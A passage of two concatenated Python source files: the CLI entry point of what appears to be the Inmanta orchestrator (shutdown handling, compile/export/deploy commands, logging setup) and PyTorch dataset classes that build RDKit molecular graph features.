# force shutdown, even when the ioloop is stuck
# schedule off the loop
t = Timer(const.SHUTDOWN_GRACE_HARD, hard_exit)
t.daemon = True
t.start()
ioloop.add_callback_from_signal(safe_shutdown_wrapper, shutdown_function)
def handle_signal_dump(signum: signal.Signals, frame: Optional[FrameType]) -> None:
context_dump(ioloop)
signal.signal(signal.SIGTERM, handle_signal)
signal.signal(signal.SIGINT, handle_signal)
signal.signal(signal.SIGUSR1, handle_signal_dump)
if rpdb:
rpdb.handle_trap()
def safe_shutdown(ioloop: IOLoop, shutdown_function: Callable[[], None]) -> None:
def hard_exit() -> None:
context_dump(ioloop)
sys.stdout.flush()
# Hard exit, not sys.exit
# ensure shutdown when the ioloop is stuck
os._exit(const.EXIT_HARD)
# force shutdown, even when the ioloop is stuck
# schedule off the loop
t = Timer(const.SHUTDOWN_GRACE_HARD, hard_exit)
t.daemon = True
t.start()
ioloop.add_callback(safe_shutdown_wrapper, shutdown_function)
async def safe_shutdown_wrapper(shutdown_function: Callable[[], Coroutine[Any, Any, None]]) -> None:
"""
Wait 10 seconds to gracefully shutdown the instance.
Afterwards stop the IOLoop
Wait for 3 seconds to force stop
"""
future = shutdown_function()
try:
timeout = IOLoop.current().time() + const.SHUTDOWN_GRACE_IOLOOP
await gen.with_timeout(timeout, future)
except TimeoutError:
pass
finally:
IOLoop.current().stop()
class ExperimentalFeatureFlags:
"""
Class to expose feature flag configs as options in a uniform matter
"""
def __init__(self) -> None:
self.metavar_to_option: Dict[str, Option[bool]] = {}
def _get_name(self, option: Option[bool]) -> str:
return f"flag_{option.name}"
def add(self, option: Option[bool]) -> None:
""" Add an option to the set of feature flags """
self.metavar_to_option[self._get_name(option)] = option
def add_arguments(self, parser: argparse.ArgumentParser) -> None:
""" Add all feature flag options to the argument parser """
for metavar, option in self.metavar_to_option.items():
parser.add_argument(
f"--experimental-{option.name}",
dest=metavar,
help=option.documentation,
action="store_true",
default=False,
)
def read_options_to_config(self, options: argparse.Namespace) -> None:
"""
This method takes input from the commandline parser
and sets the appropriate feature flag config based
on the parsed command line arguments
:param options: the options, as parsed by argparse.
"""
for metavar, option in self.metavar_to_option.items():
value = getattr(options, metavar, False)
if value:
option.set("true")
compiler_features = ExperimentalFeatureFlags()
compiler_features.add(compiler.config.feature_compiler_cache)
def compiler_config(parser: argparse.ArgumentParser) -> None:
"""
Configure the compiler of the export function
"""
parser.add_argument("-e", dest="environment", help="The environment to compile this model for")
parser.add_argument(
"-X",
"--extended-errors",
dest="errors_subcommand",
help="Show stack traces for compile errors",
action="store_true",
default=False,
)
parser.add_argument("--server_address", dest="server", help="The address of the server hosting the environment")
parser.add_argument("--server_port", dest="port", help="The port of the server hosting the environment")
parser.add_argument("--username", dest="user", help="The username of the server")
parser.add_argument("--password", dest="password", help="The password of the server")
parser.add_argument("--ssl", help="Enable SSL", action="store_true", default=False)
parser.add_argument("--ssl-ca-cert", dest="ca_cert", help="Certificate authority for SSL")
parser.add_argument(
"--export-compile-data",
dest="export_compile_data",
help="Export structured json containing compile data such as occurred errors.",
action="store_true",
default=False,
)
parser.add_argument(
"--export-compile-data-file",
dest="export_compile_data_file",
help="File to export compile data to. If omitted %s is used." % compiler.config.default_compile_data_file,
)
parser.add_argument(
"--experimental-data-trace",
dest="datatrace",
help="Experimental data trace tool useful for debugging",
action="store_true",
default=False,
)
parser.add_argument(
"--experimental-dataflow-graphic",
dest="dataflow_graphic",
help="Experimental graphic data flow visualization",
action="store_true",
default=False,
)
compiler_features.add_arguments(parser)
parser.add_argument("-f", dest="main_file", help="Main file", default="main.cf")
@command(
"compile", help_msg="Compile the project to a configuration model", parser_config=compiler_config, require_project=True
)
def compile_project(options: argparse.Namespace) -> None:
if options.environment is not None:
Config.set("config", "environment", options.environment)
if options.server is not None:
Config.set("compiler_rest_transport", "host", options.server)
if options.port is not None:
Config.set("compiler_rest_transport", "port", options.port)
if options.user is not None:
Config.set("compiler_rest_transport", "username", options.user)
if options.password is not None:
Config.set("compiler_rest_transport", "password", options.password)
if options.ssl:
Config.set("compiler_rest_transport", "ssl", "true")
if options.ca_cert is not None:
Config.set("compiler_rest_transport", "ssl-ca-cert-file", options.ca_cert)
if options.export_compile_data is True:
Config.set("compiler", "export_compile_data", "true")
if options.export_compile_data_file is not None:
Config.set("compiler", "export_compile_data_file", options.export_compile_data_file)
if options.datatrace is True:
Config.set("compiler", "datatrace_enable", "true")
if options.dataflow_graphic is True:
Config.set("compiler", "dataflow_graphic_enable", "true")
compiler_features.read_options_to_config(options)
module.Project.get(options.main_file)
if options.profile:
import cProfile
import pstats
cProfile.runctx("do_compile()", globals(), {}, "run.profile")
p = pstats.Stats("run.profile")
p.strip_dirs().sort_stats("time").print_stats(20)
else:
t1 = time.time()
do_compile()
LOGGER.debug("Compile time: %0.03f seconds", time.time() - t1)
@command("list-commands", help_msg="Print out an overview of all commands")
def list_commands(options: argparse.Namespace) -> None:
print("The following commands are available:")
for cmd, info in Commander.commands().items():
print(" %s: %s" % (cmd, info["help"]))
def help_parser_config(parser: argparse.ArgumentParser) -> None:
parser.add_argument("subcommand", help="Output help for a particular subcommand", nargs="?", default=None)
@command("help", help_msg="show a help message and exit", parser_config=help_parser_config)
def help_command(options: argparse.Namespace) -> None:
if options.subcommand is None:
cmd_parser().print_help()
else:
subc = options.subcommand
parser = cmd_parser()
parser.parse_args([subc, "-h"])
sys.exit(0)
@command(
"modules",
help_msg="Subcommand to manage modules",
parser_config=moduletool.ModuleTool.modules_parser_config,
aliases=["module"],
)
def modules(options: argparse.Namespace) -> None:
tool = moduletool.ModuleTool()
tool.execute(options.cmd, options)
@command("project", help_msg="Subcommand to manage the project", parser_config=moduletool.ProjectTool.parser_config)
def project(options: argparse.Namespace) -> None:
tool = moduletool.ProjectTool()
tool.execute(options.cmd, options)
def deploy_parser_config(parser: argparse.ArgumentParser) -> None:
parser.add_argument("--dry-run", help="Only report changes", action="store_true", dest="dryrun")
parser.add_argument("-f", dest="main_file", help="Main file", default="main.cf")
parser.add_argument(
"--dashboard",
dest="dashboard",
help="Start the dashboard and keep the server running. "
"The server uses the current project as the source for server recompiles",
action="store_true",
default=False,
)
@command("deploy", help_msg="Deploy with a inmanta all-in-one setup", parser_config=deploy_parser_config, require_project=True)
def deploy(options: argparse.Namespace) -> None:
module.Project.get(options.main_file)
from inmanta import deploy as deploy_module
run = deploy_module.Deploy(options)
try:
if not run.setup():
LOGGER.error("Failed to setup the orchestrator.")
return
run.run()
finally:
run.stop()
def export_parser_config(parser: argparse.ArgumentParser) -> None:
"""
Configure the compiler of the export function
"""
parser.add_argument("-g", dest="depgraph", help="Dump the dependency graph", action="store_true")
parser.add_argument(
"-j",
dest="json",
help="Do not submit to the server but only store the json that would have been " "submitted in the supplied file",
)
parser.add_argument("-e", dest="environment", help="The environment to compile this model for")
parser.add_argument("-d", dest="deploy", help="Trigger a deploy for the exported version", action="store_true")
parser.add_argument(
"--full",
dest="full_deploy",
help="Make the agents execute a full deploy instead of an incremental deploy. "
"Should be used together with the -d option",
action="store_true",
default=False,
)
parser.add_argument("-m", dest="model", help="Also export the complete model", action="store_true", default=False)
parser.add_argument("--server_address", dest="server", help="The address of the server to submit the model to")
parser.add_argument("--server_port", dest="port", help="The port of the server to submit the model to")
parser.add_argument("--token", dest="token", help="The token to auth to the server")
parser.add_argument("--ssl", help="Enable SSL", action="store_true", default=False)
parser.add_argument("--ssl-ca-cert", dest="ca_cert", help="Certificate authority for SSL")
parser.add_argument(
"-X",
"--extended-errors",
dest="errors_subcommand",
help="Show stack traces for compile errors",
action="store_true",
default=False,
)
parser.add_argument("-f", dest="main_file", help="Main file", default="main.cf")
parser.add_argument(
"--metadata",
dest="metadata",
help="JSON metadata why this compile happened. If a non-json string is "
"passed it is used as the 'message' attribute in the metadata.",
default=None,
)
parser.add_argument(
"--model-export",
dest="model_export",
help="Export the configuration model to the server as metadata.",
action="store_true",
default=False,
)
parser.add_argument(
"--export-plugin",
dest="export_plugin",
help="Only use this export plugin. This option also disables the execution of the plugins listed in "
"the configuration file in the export setting.",
default=None,
)
parser.add_argument(
"--export-compile-data",
dest="export_compile_data",
help="Export structured json containing compile data such as occurred errors.",
action="store_true",
default=False,
)
parser.add_argument(
"--export-compile-data-file",
dest="export_compile_data_file",
help="File to export compile data to. If omitted %s is used." % compiler.config.default_compile_data_file,
)
compiler_features.add_arguments(parser)
@command("export", help_msg="Export the configuration", parser_config=export_parser_config, require_project=True)
def export(options: argparse.Namespace) -> None:
if options.environment is not None:
Config.set("config", "environment", options.environment)
if options.server is not None:
Config.set("compiler_rest_transport", "host", options.server)
if options.port is not None:
Config.set("compiler_rest_transport", "port", options.port)
if options.token is not None:
Config.set("compiler_rest_transport", "token", options.token)
if options.ssl:
Config.set("compiler_rest_transport", "ssl", "true")
if options.ca_cert is not None:
Config.set("compiler_rest_transport", "ssl-ca-cert-file", options.ca_cert)
if options.export_compile_data is True:
Config.set("compiler", "export_compile_data", "true")
if options.export_compile_data_file is not None:
Config.set("compiler", "export_compile_data_file", options.export_compile_data_file)
compiler_features.read_options_to_config(options)
# try to parse the metadata as json. If a normal string, create json for it.
if options.metadata is not None and len(options.metadata) > 0:
try:
metadata = json.loads(options.metadata)
except json.decoder.JSONDecodeError:
metadata = {"message": options.metadata}
else:
metadata = {"message": "Manual compile on the CLI by user"}
if "cli-user" not in metadata and "USERNAME" in os.environ:
metadata["cli-user"] = os.environ["USERNAME"]
if "hostname" not in metadata:
metadata["hostname"] = socket.gethostname()
if "type" not in metadata:
metadata["type"] = "manual"
module.Project.get(options.main_file)
from inmanta.export import Exporter # noqa: H307
exp = None
types: Optional[Dict[str, inmanta_type.Type]]
scopes: Optional[Namespace]
try:
(types, scopes) = do_compile()
except Exception as e:
exp = e
types, scopes = (None, None)
# Even if the compile failed we might have collected additional data such as unknowns. So
# continue the export
export = Exporter(options)
results = export.run(
types, scopes, metadata=metadata, model_export=options.model_export, export_plugin=options.export_plugin
)
version = results[0]
if exp is not None:
raise exp
if options.model:
modelexporter = ModelExporter(types)
with open("testdump.json", "w", encoding="utf-8") as fh:
print(yaml.dump(modelexporter.export_all()))
json.dump(modelexporter.export_all(), fh)
if options.deploy:
conn = protocol.SyncClient("compiler")
LOGGER.info("Triggering deploy for version %d" % version)
tid = cfg_env.get()
agent_trigger_method = const.AgentTriggerMethod.get_agent_trigger_method(options.full_deploy)
conn.release_version(tid, version, True, agent_trigger_method)
log_levels = {0: logging.ERROR, 1: logging.WARNING, 2: logging.INFO, 3: logging.DEBUG, 4: 2}
def cmd_parser() -> argparse.ArgumentParser:
# create the argument compiler
parser = argparse.ArgumentParser()
parser.add_argument("-p", action="store_true", dest="profile", help="Profile this run of the program")
parser.add_argument("-c", "--config", dest="config_file", help="Use this config file", default=None)
parser.add_argument(
"--config-dir",
dest="config_dir",
help="The directory containing the Inmanta configuration files",
default="/etc/inmanta/inmanta.d",
)
parser.add_argument("--log-file", dest="log_file", help="Path to the logfile")
parser.add_argument(
"--log-file-level",
dest="log_file_level",
default=2,
type=int,
help="Log level for messages going to the logfile: 0=ERROR, 1=WARNING, 2=INFO, 3=DEBUG",
)
parser.add_argument("--timed-logs", dest="timed", help="Add timestamps to logs", action="store_true")
parser.add_argument(
"-v",
"--verbose",
action="count",
default=0,
help="Log level for messages going to the console. Default is only errors,"
"-v warning, -vv info and -vvv debug and -vvvv trace",
)
parser.add_argument(
"--warnings",
dest="warnings",
choices=["warn", "ignore", "error"],
default="warn",
help="The warning behaviour of the compiler. Must be one of 'warn', 'ignore', 'error'",
)
parser.add_argument(
"-X", "--extended-errors", dest="errors", help="Show stack traces for errors", action="store_true", default=False
)
parser.add_argument(
"--version",
action="store_true",
dest="inmanta_version",
help="Show the version of the installed Inmanta product and the version of its subcomponents",
default=False,
required=False,
)
subparsers = parser.add_subparsers(title="commands")
for cmd_name, cmd_options in Commander.commands().items():
cmd_subparser = subparsers.add_parser(cmd_name, help=cmd_options["help"], aliases=cmd_options["aliases"])
if cmd_options["parser_config"] is not None:
cmd_options["parser_config"](cmd_subparser)
cmd_subparser.set_defaults(func=cmd_options["function"])
cmd_subparser.set_defaults(require_project=cmd_options["require_project"])
return parser
def print_versions_installed_components_and_exit() -> None:
bootloader = InmantaBootloader()
app_context = bootloader.load_slices()
product_metadata = app_context.get_product_metadata()
extension_statuses = app_context.get_extension_statuses()
if product_metadata.version:
print(f"{product_metadata.product} ({product_metadata.edition}): {product_metadata.version}")
else:
print(f"{product_metadata.product} ({product_metadata.edition}): version unknown")
print(f"Compiler version: {get_compiler_version()}")
if extension_statuses:
print("Extensions:")
for ext_status in extension_statuses:
print(f" * {ext_status.name}: {ext_status.version}")
else:
print("Extensions: No extensions found")
sys.exit(0)
def _is_on_tty() -> bool:
return (hasattr(sys.stdout, "isatty") and sys.stdout.isatty()) or const.ENVIRON_FORCE_TTY in os.environ
def _get_default_stream_handler() -> logging.StreamHandler:
stream_handler = logging.StreamHandler(stream=sys.stdout)
stream_handler.setLevel(logging.INFO)
formatter = _get_log_formatter_for_stream_handler(timed=False)
stream_handler.setFormatter(formatter)
return stream_handler
def _get_watched_file_handler(options: argparse.Namespace) -> logging.handlers.WatchedFileHandler:
if not options.log_file:
raise Exception("No logfile was provided.")
level = _convert_to_log_level(options.log_file_level)
formatter = logging.Formatter(fmt="%(asctime)s %(levelname)-8s %(name)-10s %(message)s")
file_handler = logging.handlers.WatchedFileHandler(filename=options.log_file, mode="a+")
file_handler.setFormatter(formatter)
file_handler.setLevel(level)
return file_handler
def _convert_to_log_level(level: int) -> int:
if level >= len(log_levels):
level = len(log_levels) - 1
return log_levels[level]
def _get_log_formatter_for_stream_handler(timed: bool) -> logging.Formatter:
log_format = "%(asctime)s " if timed else ""
if _is_on_tty():
log_format += "%(log_color)s%(name)-25s%(levelname)-8s%(reset)s %(blue)s%(message)s"
formatter = colorlog.ColoredFormatter(
log_format,
datefmt=None,
reset=True,
log_colors={"DEBUG": "cyan", "INFO": "green", "WARNING": "yellow", "ERROR": "red", "CRITICAL": "red"},
)
else:
log_format += "%(name)-25s%(levelname)-8s%(message)s"
formatter = logging.Formatter(fmt=log_format)
return formatter
def app() -> None:
"""
Run the compiler
"""
# Send logs to stdout
stream_handler = _get_default_stream_handler()
logging.root.handlers = []
logging.root.addHandler(stream_handler)
logging.root.setLevel(0)
# do an initial load of known config files to build the libdir path
Config.load_config()
parser = cmd_parser()
options, other = parser.parse_known_args()
options.other = other
# Log everything to a log_file if logfile is provided
if options.log_file:
watched_file_handler = _get_watched_file_handler(options)
logging.root.addHandler(watched_file_handler)
logging.root.removeHandler(stream_handler)
else:
if options.timed:
formatter = _get_log_formatter_for_stream_handler(timed=True)
stream_handler.setFormatter(formatter)
log_level = _convert_to_log_level(options.verbose)
stream_handler.setLevel(log_level)
logging.captureWarnings(True)
if options.inmanta_version:
print_versions_installed_components_and_exit()
if options.config_file and not os.path.exists(options.config_file):
LOGGER.warning("Config file %s doesn't exist", options.config_file)
# Load the configuration
Config.load_config(options.config_file, options.config_dir)
if options.warnings is not None:
Config.set("warnings", "default", options.warnings)
config = Config.get()
assert isinstance(config, ConfigParser)
WarningsManager.apply_config(config["warnings"] if "warnings" in config else None)
# start the command
if not hasattr(options, "func"):
# show help
parser.print_usage()
return
def report(e: BaseException) -> None:
minus_x_set_top_level_command = options.errors
minus_x_set_subcommand = hasattr(options, "errors_subcommand") and options.errors_subcommand
if not minus_x_set_top_level_command and not minus_x_set_subcommand:
if isinstance(e, CompilerException):
print(e.format_trace(indent=" "), file=sys.stderr)
else:
print(str(e), file=sys.stderr)
else:
sys.excepthook(*sys.exc_info())
if isinstance(e, CompilerException):
from inmanta.compiler.help.explainer import ExplainerFactory
helpmsg = ExplainerFactory().explain_and_format(e, plain=not _is_on_tty())
if helpmsg is not None:
print(helpmsg)
try:
options.func(options)
except ShowUsageException as e:
print(e.args[0], file=sys.stderr)
parser.print_usage()
except CLIException as e:
report(e)
sys.exit(e.exitcode)
except Exception as e:
report(e)
sys.exit(1)
except KeyboardInterrupt as e:
report(e)
sys.exit(1)
sys.exit(0)
if __name__ == "__main__":
app()
| StarcoderdataPython |
154580 | """ PyTorch dataset classes for molecular data. """
import itertools
from typing import Dict, List, Tuple, Union
import numpy as np
import torch
from rdkit import Chem
# noinspection PyUnresolvedReferences
from rdkit.Chem import AllChem, rdmolops, rdPartialCharges, rdForceFieldHelpers, rdchem
from scipy import sparse
from torch.utils.data import Dataset
from conformation.distance_matrix import distmat_to_vec
from conformation.graph_data import Data
def to_one_hot(x: int, vals: Union[List, range]) -> List:
"""
Return a one-hot vector.
:param x: Data integer.
:param vals: List of possible data values.
:return: One-hot vector as list.
"""
return [x == v for v in vals]
class TestDataset(Dataset):
"""
Test.
"""
def __init__(self, data: torch.Tensor, condition: torch.Tensor = None):
super(Dataset, self).__init__()
self.data = data
self.condition = condition
def __len__(self) -> int:
return len(self.data)
def __getitem__(self, idx: int) -> Union[torch.Tensor, Tuple[torch.Tensor, torch.Tensor]]:
sample = self.data[idx]
if self.condition is not None:
return sample, self.condition
else:
return sample
class BasicDataset(Dataset):
"""
Dataset class for loading non-molecular data organized as numpy arrays
"""
def __init__(self, metadata: List[Dict[str, str]], condition: bool = False):
super(Dataset, self).__init__()
self.metadata = metadata
self.condition = condition
def __len__(self) -> int:
return len(self.metadata)
def __getitem__(self, idx: int) -> Union[torch.Tensor, Tuple[torch.Tensor, torch.Tensor]]:
data = torch.load(self.metadata[idx]['path'])
if self.condition:
condition = torch.load(self.metadata[idx]['condition'])
return data, condition
else:
return data
class MolDataset(Dataset):
"""
Dataset class for loading atomic pairwise distance information for molecules.
"""
def __init__(self, metadata: List[Dict[str, str]]):
super(Dataset, self).__init__()
self.metadata = metadata
def __len__(self) -> int:
return len(self.metadata)
def __getitem__(self, idx: int) -> torch.Tensor:
_, data = distmat_to_vec(self.metadata[idx]['path'])
data = torch.from_numpy(data)
# noinspection PyTypeChecker
data = data.type(torch.float32)
return data
def __repr__(self) -> str:
return '{}({})'.format(self.__class__.__name__, len(self))
class GraphDataset(Dataset):
"""
Dataset class for loading molecular graphs and pairwise distance targets.
"""
# noinspection PyUnresolvedReferences
def __init__(self, metadata: List[Dict[str, str]], atom_types: List[int] = None, bond_types: List[float] = None,
target: bool = True, max_path_length: int = 10, atomic_num: bool = True, partial_charge: bool = True,
mmff_atom_types_one_hot: bool = True, valence_types: List[int] = None, valence: bool = True,
aromatic: bool = True, hybridization: bool = True, assign_stereo: bool = True,
charge_types: List[int] = None, formal_charge: bool = True, r_covalent: bool = True,
r_vanderwals: bool = True, default_valence: bool = True, max_ring_size: int = 8,
rings: bool = True, chirality: bool = True, mmff94_atom_types: List[int] = None,
hybridization_types: List[Chem.HybridizationType] = None,
chi_types: List[rdchem.ChiralType] = None, improved_architecture: bool = False, max_atoms: int = 26,
degree_types: List[int] = None, degree: bool = True, num_hydrogen_types: List[int] = None,
num_hydrogen: bool = True, num_radical_electron_types: List[int] = None,
num_radical_electron: bool = True, conjugated: bool = True, bond_type: bool = True,
bond_ring: bool = True, bond_stereo: bool = True, bond_stereo_types: List[int] = None,
shortest_path: bool = True, same_ring: bool = True, autoencoder: bool = False):
"""
Custom dataset for molecular graphs.
:param metadata: Metadata contents.
:param atom_types: List of allowed atomic numbers.
:param bond_types: List of allowed bond types.
:param target: Whether or not to load target data from metadata into Data() object.
:param max_path_length: Maximum shortest path length between any two atoms in a molecule in the dataset.
:param partial_charge: Whether or not to include Gasteiger Charge as a vertex feature.\
:param mmff_atom_types_one_hot: Whether or not to include MMFF94 atom types as vertex features.
:param valence_types: List of allowed total valence numbers.
:param valence: Whether or not to include total valence as a vertex feature.
:param aromatic: Whether or not to include aromaticity as a vertex feature.
:param hybridization: Whether or not to include hybridization as a vertex feature.
:param assign_stereo: Whether or not to include stereochemistry information.
:param charge_types: Formal charge types.
:param formal_charge: Whether or not to include formal charge as a vertex feature.
:param r_covalent: Whether or not to include covalent radius as a vertex feature.
:param r_vanderwals: Whether or not to include vanderwals radius as a vertex feature.
:param default_valence: Whether or not to include default valence as a vertex feature.
:param max_ring_size: Maximum ring size.
:param rings: Whether or not to include ring size as a vertex feature.
:param chirality: Whether or not to include chirality as a vertex feature.
:param mmff94_atom_types: MMFF94 atom types.
:param hybridization_types: Hybridization types.
:param chi_types: Chiral tag types.
:param improved_architecture: Whether or not to use Jonas improved relational architecture.
:param max_atoms: Maximum number of atoms for a given molecule in the dataset (improved_architecture = True)
:param degree_types: Atomic degree types.
:param degree: Whether or not to include degree as a vertex feature.
:param num_hydrogen_types: List of allowed number of H atoms (including neighbors).
:param num_hydrogen: Whether or not to include number of (neighboring) Hs as a vertex feature.
:param num_radical_electron_types: List of allowed number of radical electrons.
:param num_radical_electron: Whether or not to include number of radical electrons as a vertex feature.
:param conjugated: Whether or not to include conjugated as an edge feature.
:param bond_type: Whether or not to include bond type as an edge feature.
:param bond_ring: Whether or not to include bond being in ring as an edge feature.
:param bond_stereo: Whether or not to include bond stereo as an edge feature.
:param bond_stereo_types: List of bond stereo types.
:param shortest_path: Whether or not to include shortest path length as a bond feature.
:param same_ring: Whether or not to include same ring as bond feature.
:param autoencoder: Whether or not to prepare data for autoencoder training.
"""
super(Dataset, self).__init__()
if bond_types is None:
self.bond_types = [0., 1., 1.5, 2., 3.]
else:
self.bond_types = bond_types
if atom_types is None:
self.atom_types = [1, 6, 7, 8, 9]
else:
self.atom_types = atom_types
self.metadata = metadata
self.target = target
self.max_path_length = max_path_length
self.atomic_num = atomic_num
self.partial_charge = partial_charge
if mmff94_atom_types is None:
self.mmff94_atom_types = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 15, 16, 17, 18, 20, 21, 22, 23, 24, 25, 26,
27, 28, 29, 30, 31, 32, 33, 37, 38, 39, 40, 42, 43, 44, 46, 48, 59, 62, 63, 64,
65, 66, 70, 71, 72, 74, 75, 78]
else:
self.mmff94_atom_types = mmff94_atom_types
self.mmff_atom_types_one_hot = mmff_atom_types_one_hot
if valence_types is None:
self.valence_types = [1, 2, 3, 4, 5, 6]
else:
self.valence_types = valence_types
self.valence = valence
self.aromatic = aromatic
if hybridization_types is None:
self.hybridization_types = [Chem.HybridizationType.S,
Chem.HybridizationType.SP,
Chem.HybridizationType.SP2,
Chem.HybridizationType.SP3,
Chem.HybridizationType.SP3D,
Chem.HybridizationType.SP3D2,
Chem.HybridizationType.UNSPECIFIED]
else:
self.hybridization_types = hybridization_types
self.hybridization = hybridization
self.assign_stereo = assign_stereo
if charge_types is None:
self.charge_types = [-1, 0, 1]
else:
self.charge_types = charge_types
self.formal_charge = formal_charge
self.r_covalent = r_covalent
self.r_vanderwals = r_vanderwals
self.default_valence = default_valence
self.max_ring_size = max_ring_size
self.rings = rings
if chi_types is None:
self.chi_types = list(rdchem.ChiralType.values.values())
else:
self.chi_types = chi_types
self.chirality = chirality
self.improved_architecture = improved_architecture
self.max_atoms = max_atoms
if degree_types is None:
self.degree_types = [1, 2, 3, 4]
else:
self.degree_types = degree_types
self.degree = degree
if num_hydrogen_types is None:
self.num_hydrogen_types = [0, 1, 2, 3]
else:
self.num_hydrogen_types = num_hydrogen_types
self.num_hydrogen = num_hydrogen
if num_radical_electron_types is None:
self.num_radical_electron_types = [0, 1, 2]
else:
self.num_radical_electron_types = num_radical_electron_types
self.num_radical_electron = num_radical_electron
self.conjugated = conjugated
self.bond_type = bond_type
self.bond_ring = bond_ring
self.bond_stereo = bond_stereo
if bond_stereo_types is None:
self.bond_stereo_types = list(rdchem.BondStereo.values.values())
else:
self.bond_stereo_types = bond_stereo_types
self.shortest_path = shortest_path
self.same_ring = same_ring
self.autoencoder = autoencoder
def __len__(self) -> int:
return len(self.metadata)
def __getitem__(self, idx) -> Union[Data, Tuple[torch.Tensor, torch.Tensor, torch.Tensor, torch.Tensor]]:
"""
Output a data object with node features, edge connectivity, and (optionally) target.
:param idx: Which item to load.
:return: Data() object.
"""
data = Data()
# Molecule from binary
# noinspection PyUnresolvedReferences
mol = Chem.Mol(open(self.metadata[idx]['binary'], "rb").read())
num_atoms = mol.GetNumAtoms()
# Target
if self.target:
# Target: 1-D tensor representing average inter-atomic distance for each edge
target = np.load(self.metadata[idx]['target'])
data.y = torch.tensor(target, dtype=torch.float)
# Compute edge connectivity in COO format corresponding to a complete graph on num_nodes
complete_graph = np.ones([num_atoms, num_atoms]) # Create an auxiliary complete graph
complete_graph = np.triu(complete_graph, k=1) # Compute an upper triangular matrix of the complete graph
complete_graph = sparse.csc_matrix(complete_graph) # Compute a csc style sparse matrix from this graph
row, col = complete_graph.nonzero() # Extract the row and column indices corresponding to non-zero entries
row = torch.tensor(row, dtype=torch.long)
col = torch.tensor(col, dtype=torch.long)
data.edge_index = torch.stack([row, col]) # Edge connectivity in COO format (all possible edges)
# Edge features
edge_features = []
edge_count = 0
for a, b in itertools.combinations(list(np.arange(num_atoms)), 2):
bond_feature = []
bond = mol.GetBondBetweenAtoms(int(a), int(b))
if bond is None:
if self.bond_type:
bond_feature += [1] + [0]*len(self.bond_types)
if self.conjugated:
bond_feature += [0]
if self.bond_ring:
bond_feature += [0]
if self.bond_stereo:
bond_feature += [0]*len(self.bond_stereo_types)
if self.shortest_path:
path_len = len(rdmolops.GetShortestPath(mol, int(a), int(b))) - 1
bond_feature += to_one_hot(path_len - 1, range(self.max_path_length))
if self.same_ring:
ring_info = list(mol.GetRingInfo().AtomRings())
membership = [int(a) in r and int(b) in r for r in ring_info]
if sum(membership) > 0:
bond_feature += [1]
else:
bond_feature += [0]
if self.autoencoder:
# noinspection PyUnboundLocalVariable
bond_feature += [target[:, 0][edge_count]]
else:
if self.bond_type:
bond_feature += [0]
bond_feature += to_one_hot(bond.GetBondTypeAsDouble(), self.bond_types)
if self.conjugated:
bond_feature += [bond.GetIsConjugated()]
if self.bond_ring:
bond_feature += [bond.IsInRing()]
if self.bond_stereo:
bond_feature += to_one_hot(bond.GetStereo(), self.bond_stereo_types)
if self.shortest_path:
path_len = len(rdmolops.GetShortestPath(mol, int(a), int(b))) - 1
bond_feature += to_one_hot(path_len - 1, range(self.max_path_length))
if self.same_ring:
ring_info = list(mol.GetRingInfo().AtomRings())
membership = [int(a) in r and int(b) in r for r in ring_info]
if sum(membership) > 0:
bond_feature += [1]
else:
bond_feature += [0]
if self.autoencoder:
bond_feature += [target[:, 0][edge_count]]
edge_count += 1
edge_features.append(bond_feature)
data.edge_attr = torch.tensor(edge_features, dtype=torch.float)
# Vertex features
# List to hold all vertex features
vertex_features = []
pt = Chem.GetPeriodicTable()
if self.partial_charge:
rdPartialCharges.ComputeGasteigerCharges(mol)
mmff_p = None
if self.mmff_atom_types_one_hot:
# AllChem.EmbedMolecule(mol, maxAttempts=100000)
# AllChem.MMFFOptimizeMolecule(mol)
mmff_p = rdForceFieldHelpers.MMFFGetMoleculeProperties(mol)
if self.assign_stereo:
rdmolops.AssignStereochemistryFrom3D(mol)
for i in range(num_atoms):
atom = mol.GetAtomWithIdx(i)
atom_feature = []
if self.atomic_num:
atom_feature += to_one_hot(atom.GetAtomicNum(), self.atom_types)
if self.valence:
atom_feature += to_one_hot(atom.GetTotalValence(), self.valence_types)
if self.aromatic:
atom_feature += [atom.GetIsAromatic()]
if self.hybridization:
atom_feature += to_one_hot(atom.GetHybridization(), self.hybridization_types)
if self.partial_charge:
gc = float(atom.GetProp('_GasteigerCharge'))
if not np.isfinite(gc):
gc = 0.0
atom_feature += [gc]
if self.formal_charge:
atom_feature += to_one_hot(atom.GetFormalCharge(), self.charge_types)
if self.r_covalent:
atom_feature += [pt.GetRcovalent(atom.GetAtomicNum())]
if self.r_vanderwals:
atom_feature += [pt.GetRvdw(atom.GetAtomicNum())]
if self.default_valence:
atom_feature += to_one_hot(pt.GetDefaultValence(atom.GetAtomicNum()), self.valence_types)
if self.rings:
atom_feature += [atom.IsInRingSize(r) for r in range(3, self.max_ring_size + 1)]
if self.chirality:
atom_feature += to_one_hot(atom.GetChiralTag(), self.chi_types)
if self.mmff_atom_types_one_hot:
if mmff_p is None:
atom_feature += [0] * len(self.mmff94_atom_types)
else:
atom_feature += to_one_hot(mmff_p.GetMMFFAtomType(i), self.mmff94_atom_types)
if self.degree:
atom_feature += to_one_hot(atom.GetDegree(), self.degree_types)
if self.num_hydrogen:
atom_feature += to_one_hot(atom.GetTotalNumHs(), self.num_hydrogen_types)
if self.num_radical_electron:
atom_feature += to_one_hot(atom.GetNumRadicalElectrons(), self.num_radical_electron_types)
vertex_features.append(atom_feature)
data.x = torch.tensor(vertex_features, dtype=torch.float)
# UID
data.uid = torch.tensor([int(self.metadata[idx]['uid'])])
if self.improved_architecture:
# Vertex features
v_in = data.x
padding = torch.zeros([self.max_atoms, v_in.shape[1]])
padding[:v_in.shape[0], :] = v_in
v_in = padding
# Mask
mask = torch.tensor([1. if x < num_atoms else 0. for x in range(self.max_atoms)])
# Edge features
k = 0
e_in = torch.zeros([num_atoms, num_atoms, data.edge_attr.shape[1]])
for i, j in itertools.combinations(np.arange(num_atoms), 2):
e_in[i, j, :] = data.edge_attr[k, :]
e_in[j, i, :] = data.edge_attr[k, :]
k += 1
padding = torch.zeros([self.max_atoms, self.max_atoms, data.edge_attr.shape[1]])
padding[:e_in.shape[0], :e_in.shape[0], :] = e_in
e_in = padding
# Target
target = data.y
padding = torch.zeros([self.max_atoms*self.max_atoms - self.max_atoms, data.y.shape[1]])
padding[:target.shape[0], :] = target
target = padding
return v_in, e_in, mask, target
else:
return data
def __repr__(self) -> str:
return '{}({})'.format(self.__class__.__name__, len(self))
class CNFDataset(Dataset):
"""
Dataset class for loading atomic pairwise distance information for molecules for a conditional normalizing flow.
"""
